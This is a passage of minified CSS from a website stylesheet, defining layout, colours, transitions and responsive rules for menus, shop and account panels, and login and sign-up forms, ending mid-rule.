.iUPnKw{display:none}.jmTZTf{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:start;-webkit-justify-content:flex-start;-ms-flex-pack:start;justify-content:flex-start}.hRUATH{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end}.dahGoY{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.cBuhVE{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;width:50%;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.bTXjyx{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;width:50%;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.cZYTXH{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:flex-end;-webkit-box-align:flex-end;-ms-flex-align:flex-end;align-items:flex-end;width:450px;-webkit-box-pack:end;-webkit-justify-content:flex-end;-ms-flex-pack:end;justify-content:flex-end}.QIhzG{width:100%;height:100%}.QIhzG.selected{color:#4192f7}.QIhzG.selected svg{fill:#4192f7}.kowUgC{width:100%;display:none}@media (min-width:768px){.kowUgC{display:none}}@media (min-width:783px){.kowUgC{display:none}}@media (min-width:1024px){.kowUgC{display:block}}@media (min-width:1250px){.kowUgC{display:block}}.kowUgC a,.kowUgC a:active,.kowUgC a:focus,.kowUgC a:visited{-webkit-text-decoration:inherit;text-decoration:inherit;color:inherit}.gaQNmc{width:100%;display:block}@media (min-width:768px){.gaQNmc{display:block}}@media (min-width:783px){.gaQNmc{display:block}}@media (min-width:1024px){.gaQNmc{display:none}}@media (min-width:1250px){.gaQNmc{display:none}}.gaQNmc a,.gaQNmc a:active,.gaQNmc a:focus,.gaQNmc a:visited{-webkit-text-decoration:inherit;text-decoration:inherit;color:inherit}.clkpzw{width:100%;position:absolute;z-index:-1;opacity:1;-webkit-transition:top .25s ease-in-out;transition:top .25s ease-in-out;display:block}.clkpzw.clkpzw.clkpzw{top:calc(50px)}@media (min-width:768px){.clkpzw.clkpzw.clkpzw{top:calc(50px)}}@media (min-width:783px){.clkpzw.clkpzw.clkpzw{top:calc(50px)}}.clkpzw.hidden{opacity:0;-webkit-animation:etSMyW .25s ease-in-out;animation:etSMyW .25s ease-in-out}.clkpzw.hiddenTop{top:-50px!important}@media (min-width:768px){.clkpzw{display:block}}@media (min-width:783px){.clkpzw{display:block}}@media (min-width:1024px){.clkpzw{display:none}}@media (min-width:1250px){.clkpzw{display:none}}.clkpzw a,.clkpzw a:active,.clkpzw a:focus,.clkpzw a:visited{-webkit-text-decoration:inherit;text-decoration:inherit;color:inherit}.hTlVBe{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:25px;width:100%;margin:auto;color:#fff;background-color:#011238}.ksMMnC{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:100%;width:100%;max-width:1272px;margin:auto;font-size:10px}.fTmTgB{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:50px;width:100%;margin:auto}.gWkFJj{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:100%;width:100%;margin:auto;color:#000;background-color:#fff;font-size:16px}.hKIHkW{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:50px;width:100%;margin:auto;border-bottom:1px solid #bfbfbf}.ifXMVA{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:100%;width:100%;margin:auto;color:#000;background-color:#fff;border-bottom:1px solid #bfbfbf;font-size:16px}.bVNQtI{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:75px;width:100%;margin:auto;color:#011238;background-color:#fff;-webkit-transition:height .4s ease-in-out;transition:height .4s ease-in-out}.sticky-top .bVNQtI{height:50px}.BmyUS{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:100%;width:100%;max-width:1272px;margin:auto}.dWbMJH{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;height:50px;width:100%;margin:auto;background-color:#011238}.gUtyqO{height:100%;width:2px;background-color:#bfbfbf}.cQNFpP{width:100%;-webkit-flex:1;-ms-flex:1;flex:1;position:relative;background-color:#6d6d6d}.OcxaF{font-size:16px;position:absolute;width:50%;height:100vh;top:0;left:0;overflow-x:hidden;overflow-y:auto;background:#333;height:calc(100vh - 50px)}@media (min-width:783px){.OcxaF{height:calc(100vh - 50px)}}@media (min-width:1024px){.OcxaF{height:calc(100vh - 0px)}}.fBTNKH{outline:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;height:46px;padding:0 16px;cursor:pointer;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#fff}.sc-blIhvV.active .fBTNKH,.sc-dlyikq.active .fBTNKH{background:#6d6d6d}.fBTNKH .arrow{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.fBTNKH .arrow.right{-webkit-transform:rotate(180deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.dnSftX{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.QqKeG{font-size:16px;position:absolute;width:50%;height:100vh;top:0;left:100%;overflow-x:hidden;overflow-y:auto;background:#6d6d6d;-webkit-transition:left .4s ease-in-out;transition:left .4s ease-in-out;padding-bottom:80px;height:calc(100vh - 50px)}.QqKeG.active{left:50%;z-index:1}@media (min-width:783px){.QqKeG{height:calc(100vh - 50px)}}@media (min-width:1024px){.QqKeG{height:calc(100vh - 0px)}}.gazMdH{outline:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;height:46px;padding:0 16px;cursor:pointer;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#fff}.gazMdH .arrow{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.gazMdH .arrow.down{-webkit-transform:rotate(180deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.bKwUAo{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.esuVrC{outline:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;height:46px;padding:0 16px;cursor:pointer;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;color:#fff;-webkit-text-decoration:none;text-decoration:none}.esuVrC .arrow{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.esuVrC .arrow.down{-webkit-transform:rotate(180deg);-ms-transform:rotate(180deg);transform:rotate(180deg)}.esuVrC:active,.esuVrC:focus,.esuVrC:visited{color:#fff}.ibfPGm{height:0;overflow:hidden;-webkit-transition:height .4s ease-in-out;transition:height .4s ease-in-out}.ibfPGm.active{height:30px}.hSJIOj{font-size:14px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;height:36px;padding:0 28px;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-text-decoration:underline;text-decoration:underline;color:#fff}.hSJIOj:focus,.hSJIOj:hover,.hSJIOj:visited{color:#fff}.gSnumd{text-overflow:ellipsis;white-space:nowrap;overflow:hidden}.jaMvjW{height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.kqIHnM{width:100%;padding:15px 4px 15px;position:relative}.eEMhT{color:#000;font-size:16px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;outline:0;cursor:pointer}.jWyTtC{outline:0;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;display:none}.collapsed .jWyTtC.collapsed{display:block}.expanded .jWyTtC.expanded{display:block}.jWyTtC span{font-weight:700;position:relative}.jMXvnB{outline:0;-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;padding:0 6px;display:none}.jMXvnB .pointer{cursor:pointer}.collapsed .jMXvnB.collapsed,.expanded .jMXvnB.expanded,.jMXvnB.always{display:block}.jMXvnB .material-icons{font-size:40px;color:#bfbfbf}.jrYwyq{padding:0 4px;display:none}.expanded .jrYwyq{display:block}.kaFpHe{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:6px 10px;-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;font-size:16px;text-align:center;line-height:1;height:36px;border-radius:2px;outline:0;color:#000;background:#f5f5f5;cursor:pointer}.kaFpHe.checked{color:#fff;background-color:#4192f7}.kiEKbJ{padding:6px 4px;position:relative}.EiSIn{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.EiSIn .sc-hCbubC{height:100%;width:calc(100% / 3)}.uUDKz{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.uUDKz .sc-hCbubC{height:100%;width:calc(100% / 4)}.kVZZIj{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.kVZZIj .sc-hCbubC{height:100%;width:calc(100% / 7)}.ilbRAa{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-wrap:wrap;-ms-flex-wrap:wrap;flex-wrap:wrap}.ilbRAa .sc-hCbubC{height:100%;width:calc(100% / 2)}.bcoKla{position:relative}.ljGlKU.ljGlKU.ljGlKU{width:100%;background:0 0;color:#000;outline:0;box-shadow:none;border:1px solid #9e9e9e;border-radius:2px;-webkit-appearance:none;-webkit-border-radius:2px;padding:1px 6px;font-size:16px;line-height:1.5;cursor:pointer;background-image:linear-gradient(45deg,transparent 50%,#9e9e9e 50%),linear-gradient(135deg,#9e9e9e 50%,transparent 50%),linear-gradient(to right,transparent,transparent);background-position:calc(100% - 20px) calc(.7em + 2px),calc(100% - 15px) calc(.7em + 2px),100% 0;background-size:5px 5px,5px 5px,2.5em 2.5em;background-repeat:no-repeat;background-color:transparent;height:36px}.ljGlKU.ljGlKU.ljGlKU:active,.ljGlKU.ljGlKU.ljGlKU:focus{color:#9e9e9e;background-color:transparent;border-color:#9e9e9e}.ljGlKU.ljGlKU.ljGlKU:disabled{cursor:default;background-image:linear-gradient(45deg,transparent 50%,rgba(158,158,158,.5) 50%),linear-gradient(135deg,rgba(158,158,158,.5) 50%,transparent 50%),linear-gradient(to right,transparent,transparent);color:rgba(158,158,158,.5);background-color:transparent;border-color:rgba(158,158,158,.5)}.jedwTc{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.dcnznL{width:50%;position:relative;padding:6px 4px}.cwYwqD{height:100%}.cwYwqD select{-moz-appearance:none;text-indent:.01px;text-overflow:''}.lmVZDR{height:100%}.lmVZDR select{-moz-appearance:none;text-indent:.01px;text-overflow:''}.VwNga{margin:2rem 0}.iEGKLZ{text-transform:uppercase;color:#000;font-size:16px}.hOrsRw{margin:0 auto;position:relative;width:100px;height:60px;overflow:hidden}.gwtwWP{position:absolute;width:100px;height:100px;bottom:0}.jklYAn{text-align:center;font-size:12px}.lneiwa{outline:0;cursor:pointer;background-color:transparent}.lneiwa .sc-SFOxd svg{fill:#000}.lneiwa .sc-dzOgQY{color:#000}.lneiwa.checked{background-color:#4192f7}.lneiwa.checked .sc-SFOxd svg{fill:#fff}.lneiwa.checked .sc-dzOgQY{color:#fff}.bYkCMZ{outline:0;cursor:pointer}.disabled .bYkCMZ{cursor:default}.cUIvKI{margin:0 auto;position:relative;width:36px;height:36px}.buQGVb{display:none}.buQGVb.buQGVb{position:absolute;left:0;top:0;width:100%;height:100%;line-height:36px;text-align:center}.checked .buQGVb.buQGVb{display:block;font-size:36px;color:#9e9e9e}.gkvaZZ.gkvaZZ{position:absolute;left:0;top:0;width:100%;height:100%;line-height:36px;text-align:center}.gkvaZZ.gkvaZZ{font-size:26px;color:#000}.dQQWRv.dQQWRv{position:absolute;left:0;top:0;width:100%;height:100%;line-height:36px;text-align:center}.dQQWRv.dQQWRv{font-size:24px}.ejmNCW{text-align:center;color:#000;font-size:12px}.jpHvxP{position:absolute;overflow:hidden;height:1;width:1}.hFePYG{-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.hFePYG,.hFePYG *{box-sizing:border-box}.hFePYG .sc-gjAXCV{border-bottom:2px solid #bfbfbf}.hFePYG .sc-gjAXCV:last-child{border-bottom-width:0}.fnosjm{padding:0 25px;padding-bottom:200px}.idlVaW{position:absolute;width:1px;height:1px;overflow:hidden}.gySaQJ{margin:10px auto;padding:10px 0;text-align:center;outline:0;cursor:pointer}.gySaQJ .text{-webkit-text-decoration:underline;text-decoration:underline;text-transform:uppercase;vertical-align:top}.kssVtK{display:block;border:none;outline:0;border-radius:2px;line-height:36px;font-size:18px;text-transform:uppercase;text-align:center;margin:0 auto;cursor:pointer}.kssVtK,.kssVtK:focus,.kssVtK:hover,.kssVtK:visited{color:#fff;background-color:#000;border:2px solid #000;-webkit-text-decoration:none;text-decoration:none}.cOsyJ{outline:0;line-height:36px;font-size:18px;text-align:center;margin:10px;width:40%;height:36px}.bhhXoF{display:block;color:#000;border:2px solid #000;border-radius:2px;line-height:36px;text-transform:uppercase;cursor:pointer;outline:0}.bpoBDg{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center;padding:6px 12px;position:fixed;bottom:0;width:100%;background-color:#eee}.dyYfjy{color:#000;width:100%;height:100%}.iazLmv{display:inline-block;width:40px;height:40px;background-color:#fff;-webkit-animation:kxzfpx 1.2s infinite ease-in-out;animation:kxzfpx 1.2s infinite ease-in-out}.eRautH{position:relative;width:100%;height:100%;cursor:default}.ilswia{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:-100%}.sc-ekHBYt.loading .ilswia{left:0}.uKeDN{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:-100%}.sc-ekHBYt.loading .uKeDN{left:100%}.sc-ekHBYt.login .uKeDN{left:0}.mkuBu{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.logging-in .mkuBu{left:0}.dONquv{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.reset-password .dONquv{left:0}.sc-ekHBYt.resetting-password .dONquv{left:-100%}.dUaGmK{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.resetting-password .dUaGmK{left:0}.dSnjEh{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.sign-up .dSnjEh{left:0}.sc-ekHBYt.signing-up .dSnjEh{left:-100%}.isxwqY{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.signing-up .isxwqY{left:0}.eiPzFN{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.logging-out .eiPzFN{left:-100%}.sc-ekHBYt.account .eiPzFN{left:0}.blevrK{position:absolute;width:100%;height:100%;-webkit-transition:left .4s ease-in-out,left .4s ease-in-out;transition:left .4s ease-in-out,left .4s ease-in-out;padding:15px;overflow-x:hidden;overflow-y:auto;left:100%}.sc-ekHBYt.logging-out .blevrK{left:0}.bClNws{width:100%;position:relative}.jpYyju{width:100%;position:relative}.bFQrxy.bFQrxy{width:100%;height:40px;border:none;outline:0;border-radius:6px;text-align:center;font-size:14px;color:#fff;margin:0 0 15px 0;padding:0 10px}.bFQrxy.bFQrxy[name=password]{-webkit-text-security:disc}.bFQrxy.bFQrxy,.bFQrxy.bFQrxy:active,.bFQrxy.bFQrxy:focus{background-color:#424242}.cVDDPa.cVDDPa{display:block;background-color:#d71820;color:#fff;border:none;border-radius:2px;width:100%;height:40px;line-height:40px;font-size:14px;text-transform:uppercase;text-align:center;margin:10px 0;cursor:pointer;outline:0;-webkit-text-decoration:none;text-decoration:none;padding:1px 7px 2px}.dZAGSV{color:red;font-weight:700;background-color:pink;padding:2px;border:1px solid red;margin:1em 0}.jHXAdR{display:block;text-align:center}.iYIlYh{display:block;margin:20px;text-align:center}.iNwmcz.iNwmcz{font-size:14px;text-transform:uppercase;color:#d71820;-webkit-text-decoration:underline;text-decoration:underline;margin-bottom:10px}.cisAUF{cursor:pointer}.hsPEoE{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center}.bYgfZs{-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;height:1px;border-top:1px solid #fff}.fhsInK{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;margin:10px}.cJXjku{font-size:14px;line-height:16px;padding:2px;position:relative;height:80px}.eQDKhU{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;width:100%;height:100%;-webkit-align-items:center;-webkit-box-align:center;-ms-flex-align:center;align-items:center;padding:0 6px;background-color:#444;-webkit-transition:background-color .4s ease-in-out;transition:background-color .4s ease-in-out}.eQDKhU:hover{background-color:#555}.kSQXnb{display:block;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0}.kSQXnb,.kSQXnb:hover{color:#fff;-webkit-text-decoration:none;text-decoration:none}.eaUGlQ{font-weight:700}.eOFbyi{-webkit-text-decoration:underline;text-decoration:underline}.iaHKBE{-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0;width:24px;height:100%;text-align:right;cursor:pointer;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:center;-webkit-justify-content:center;-ms-flex-pack:center;justify-content:center}.iaHKBE .material-icons{-webkit-transition:color .4s ease-in-out;transition:color .4s ease-in-out}.iaHKBE:hover .material-icons{color:#fff;font-weight:700}.kSHzFa{display:inline-block;cursor:pointer}.gZjVkf{width:25px;margin:5px;-webkit-box-flex:0;-webkit-flex-grow:0;-ms-flex-positive:0;flex-grow:0;-webkit-flex-shrink:0;-ms-flex-negative:0;flex-shrink:0}.bIUEdz{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;height:60px}.gunzTT{display:block;-webkit-box-flex:1;-webkit-flex-grow:1;-ms-flex-positive:1;flex-grow:1}.gunzTT,.gunzTT:active,.gunzTT:focus,.gunzTT:hover,.gunzTT:visited{-webkit-text-decoration:none;text-decoration:none;color:#fff}.lfbZcs{font-size:14px;line-height:16px}.iLYHHX{text-transform:uppercase;margin:8px 0;font-size:20px}.iDyXGW{outline:0;cursor:pointer}.jwmmcQ{padding:16px;height:100%;overflow-x:hidden;overflow-y:auto}.eEUiqa,.eEUiqa *{box-sizing:border-box}.eEUiqa.eEUiqa{color:#fff;background:#262523;overflow:hidden}.cZpyWc{position:absolute;overflow-x:hidden;overflow-y:hidden;top:0;left:0;height:100%;width:100%;-webkit-transition:left .2s ease-in-out;transition:left .2s ease-in-out;padding-top:50px;left:-100%}.account .cZpyWc{left:-100%}.shop .cZpyWc{left:0}.gLrMCP{position:absolute;overflow-x:hidden;overflow-y:hidden;top:0;left:0;height:100%;width:100%;-webkit-transition:left .2s ease-in-out;transition:left .2s ease-in-out;padding-top:50px;left:-100%}.account .gLrMCP{left:0}.shop .gLrMCP{left:100%}.fdmzHg{position:absolute;top:0;left:0;height:50px;width:100%;z-index:10}.dEYHnQ{position:absolute;top:0;height:100%;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.kzoAAg{width:50%;height:100%;text-transform:uppercase;cursor:pointer;text-align:center;padding-top:10px;font-size:18px}.eosNiI{position:absolute;width:50%;height:8px;background-color:#d71820;bottom:0;-webkit-transition:left .2s ease-in-out;transition:left .2s ease-in-out}.shop .eosNiI{left:0}.account .eosNiI{left:50%}.bBzUYS{height:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}.gNtFqn{background-color:rgba(51,51,51,.8);position:absolute;left:0;top:0;width:100%;height:100vh;opacity:1;-webkit-transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;top:50px;height:calc(100vh - (50px + 0px))}.gNtFqn.hidden{opacity:0;-webkit-animation:etSMyW .25s ease-in-out;animation:etSMyW .25s ease-in-out}.gNtFqn.hiddenLeft{left:-100%}.gNtFqn.hiddenRight{left:100%}.gNtFqn.hiddenTop{top:-100vh}.gNtFqn.hiddenBottom{top:100vh}.gNtFqn.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.gNtFqn.hiddenTop{top:calc(-100vh + (50px + 0px))}.gNtFqn.hiddenBottom{top:calc(100vh + (50px + 0px))}@media (min-width:783px){.gNtFqn{top:50px;height:calc(100vh - (50px + 0px))}.gNtFqn.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.gNtFqn.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.gNtFqn.hiddenTop{top:calc(-100vh + (50px + 0px))}.gNtFqn.hiddenBottom{top:calc(100vh + (50px + 0px))}}@media (min-width:1024px){.gNtFqn{top:0;height:calc(100vh - (0px + 0px));display:none}.gNtFqn.search-bar{top:calc(0px);height:calc(100vh - (0px + 0px))}.gNtFqn.search-bar.hiddenTop{top:calc(-100vh + (0px + 0px))}.gNtFqn.search-bar.hiddenBottom{top:calc(100vh + (0px + 0px))}.gNtFqn.hiddenTop{top:calc(-100vh + (0px + 0px))}.gNtFqn.hiddenBottom{top:calc(100vh + (0px + 0px))}}.cXirUR{background-color:rgba(255,255,255,.8);position:absolute;left:0;top:0;width:100%;height:100vh;opacity:1;-webkit-transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;transition:top .25s ease-in-out,left .25s ease-in-out,height .25s ease-in-out;top:50px;height:calc(100vh - (50px + 0px))}.cXirUR.hidden{opacity:0;-webkit-animation:etSMyW .25s ease-in-out;animation:etSMyW .25s ease-in-out}.cXirUR.hiddenLeft{left:-100%}.cXirUR.hiddenRight{left:100%}.cXirUR.hiddenTop{top:-100vh}.cXirUR.hiddenBottom{top:100vh}.cXirUR.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.cXirUR.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.cXirUR.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.cXirUR.hiddenTop{top:calc(-100vh + (50px + 0px))}.cXirUR.hiddenBottom{top:calc(100vh + (50px + 0px))}@media (min-width:783px){.cXirUR{top:50px;height:calc(100vh - (50px + 0px))}.cXirUR.search-bar{top:calc(50px + 50px);height:calc(100vh - (50px + 50px + 0px))}.cXirUR.search-bar.hiddenTop{top:calc(-100vh + (50px + 50px + 0px))}.cXirUR.search-bar.hiddenBottom{top:calc(100vh + (50px + 50px + 0px))}.cXirUR.hiddenTop{top:calc(-100vh + (50px + 0px))}.cXirUR.hiddenBottom{top:calc(100vh + (50px + 0px))}}@media (min-width:1024px){.cXirUR{top:0;height:calc(100vh - (0px + 0px));display:none}.cXirUR.search-bar{top:calc(0px);height:calc(100vh - (0px + 0px))}.cXirUR.search-bar.hiddenTop{top:calc(-100vh + (0px + 0px))}.cXirUR.search-bar.hiddenBottom{top:calc(100vh + (0px + 0px))}.cXirUR.hiddenTop{top:calc(-100vh + (0px + 0px))}.cXirUR.hiddenBottom{top:calc(100vh + (0px + 0px))}}.bNxQUf{color:#000;background-color:#333;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;-webkit-overflow-scrolling:touch;position:absolute}.bNxQUf.hasChanged{background-color:#333}.kfETSJ{color:#000;background-color:#fff;width:100%;height:100%;overflow-x:hidden;overflow-y:auto;-webkit-overflow-scrolling:touch;position:absolute}.kfETSJ.hasChanged{background-color:#333}.ijdEqt{display:none;position:absolute;left:100%;width:320px}@media (min-width:1024px){.ijdEqt{display:block}}.dWtxyS{position:fixed;top:1px;left:1px;width:1px;height:1px;overflow:hidden}.hBTKjV{position:fixed;left:0;bottom:0;height:40px;width:100%;z-index:40}@media (min-width:1024px){.hBTKjV{display:none}}.hBTKjV.bottom-open{z-index:901}.fWsvHk{position:absolute;bottom:0;width:100%;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-align-items:stretch;-webkit-box-align:stretch;-ms-flex-align:stretch;align-items:stretch;height:100%}.hveJag{position:absolute;bottom:0;width:100%;display:none;background:rgba(0,0,0,.6);height:100%}.bottom-open 